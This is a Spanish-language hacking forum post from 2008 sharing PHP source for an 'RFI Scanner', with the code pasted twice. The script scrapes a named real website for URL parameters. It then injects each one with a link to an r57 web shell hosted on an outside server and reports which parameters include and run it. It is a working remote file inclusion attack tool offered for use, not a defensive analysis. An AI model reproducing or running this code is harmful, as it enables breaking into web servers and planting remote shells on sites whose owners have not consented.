alienmaster
04-10-2008, 13:47
Lo programe hace bastante tiempo, me habia olvidado de el hasta ayer que lo encontre y decidid publicar el codigo :P
Mas informacion: http://www.elefren.com/blog/RFI-Scanner-en-PHP/
Saludos, elefrEn
<?
/*
RFI Scanner 1.0
Author: elefrEn
Website: http://elefren.com/
email: [email protected]
Dedicated to Spanish Hackers Team - http://spanish-hackers.com/
Gr33tz: -> JosS | nhh-32 | Omega <-
*/
set_time_limit(0);
#Config
$urlweb = "www.guia-ubuntu.org";# Out http://, ex: google.com
$urlshell = "http://usuarios.lycos.es/w0rms/r57.gif";# Url where you sent the shell script
$comunvars = "cual|admindir|sec|id|file|doc|module|modulo|name";# Comun vars vulns to RFI in cms´s, etc...
$filetoscan = "index.php";# The file that you want scan
#Funcs
function vars($url){
$xpl = parse_url($url);$xpl = $xpl[query];$xpl = explode("&",$xpl);
$var = 0;
while($var < count($xpl)){
$v4r = explode("=",$xpl[$var]);
$m0s .= '|'.$v4r[0];
$var++;
}
$m0s = str_replace('amp;','',$m0s);
return $m0s;
}
function beerres($list, $barras = FALSE){
$s3p4 = '<br>';
if($barras) $s3p4 = '|';
$list = explode('|',$list);
$var = 0;
while($var < count($list)){
if($list[$var] != ''){
if(!@preg_match("/$list[$var]/i",$m0s) ){
$m0s .= $list[$var].$s3p4;
}
}
$var++;
}
return $m0s;
}
function extrac($n00b, $file = FALSE){
$n0ob = 'http://'.$n00b;
$source = join("",file(&$n0ob));
$vars = preg_match_all('/<a href="'.$file.'(.*)">(.*)<\/a>/i',$source,$results);
$t0t = count($results[1]);
$var = 0;
while($var < $t0t){
$xtr = explode('"',$results[1][$var]);
$urllist .= $xtr[0].'|';
$varlist .= vars($xtr[0]);
$var++;
}
$m0s .= $varlist;
return beerres($m0s,1);
}
function rfi($vars,$web,$file,$urlshell){
$list = explode('|',$vars);
$var = 0;
while($var < count($list)){
$url = $web.$file."?".$list[$var]."=".$urlshell."?";
$source = join("",file(&$url));
if(preg_match("/shell/i",$source)){
$m0s .= "<font color=red><b>RFI-></b></font> ";
}else{
$m0s .= "<font color=green><b>Secure-></b></font> ";
}
$m0s .= $url.'<br>';
$var++;
}
return $m0s;
}
#Exec
echo rfi(extrac($urlweb).$comunvars,'http://'.$urlweb.'/',$filetoscan,$urlshell);
?>
Mas informacion: http://www.elefren.com/blog/RFI-Scanner-en-PHP/
Saludos, elefrEn
<?
/*
RFI Scanner 1.0
Author: elefrEn
Website: http://elefren.com/
email: [email protected]
Dedicated to Spanish Hackers Team - http://spanish-hackers.com/
Gr33tz: -> JosS | nhh-32 | Omega <-
*/
set_time_limit(0);
#Config
$urlweb = "www.guia-ubuntu.org";# Out http://, ex: google.com
$urlshell = "http://usuarios.lycos.es/w0rms/r57.gif";# Url where you sent the shell script
$comunvars = "cual|admindir|sec|id|file|doc|module|modulo|name";# Comun vars vulns to RFI in cms´s, etc...
$filetoscan = "index.php";# The file that you want scan
#Funcs
function vars($url){
$xpl = parse_url($url);$xpl = $xpl[query];$xpl = explode("&",$xpl);
$var = 0;
while($var < count($xpl)){
$v4r = explode("=",$xpl[$var]);
$m0s .= '|'.$v4r[0];
$var++;
}
$m0s = str_replace('amp;','',$m0s);
return $m0s;
}
function beerres($list, $barras = FALSE){
$s3p4 = '<br>';
if($barras) $s3p4 = '|';
$list = explode('|',$list);
$var = 0;
while($var < count($list)){
if($list[$var] != ''){
if(!@preg_match("/$list[$var]/i",$m0s) ){
$m0s .= $list[$var].$s3p4;
}
}
$var++;
}
return $m0s;
}
function extrac($n00b, $file = FALSE){
$n0ob = 'http://'.$n00b;
$source = join("",file(&$n0ob));
$vars = preg_match_all('/<a href="'.$file.'(.*)">(.*)<\/a>/i',$source,$results);
$t0t = count($results[1]);
$var = 0;
while($var < $t0t){
$xtr = explode('"',$results[1][$var]);
$urllist .= $xtr[0].'|';
$varlist .= vars($xtr[0]);
$var++;
}
$m0s .= $varlist;
return beerres($m0s,1);
}
function rfi($vars,$web,$file,$urlshell){
$list = explode('|',$vars);
$var = 0;
while($var < count($list)){
$url = $web.$file."?".$list[$var]."=".$urlshell."?";
$source = join("",file(&$url));
if(preg_match("/shell/i",$source)){
$m0s .= "<font color=red><b>RFI-></b></font> ";
}else{
$m0s .= "<font color=green><b>Secure-></b></font> ";
}
$m0s .= $url.'<br>';
$var++;
}
return $m0s;
}
#Exec
echo rfi(extrac($urlweb).$comunvars,'http://'.$urlweb.'/',$filetoscan,$urlshell);
?>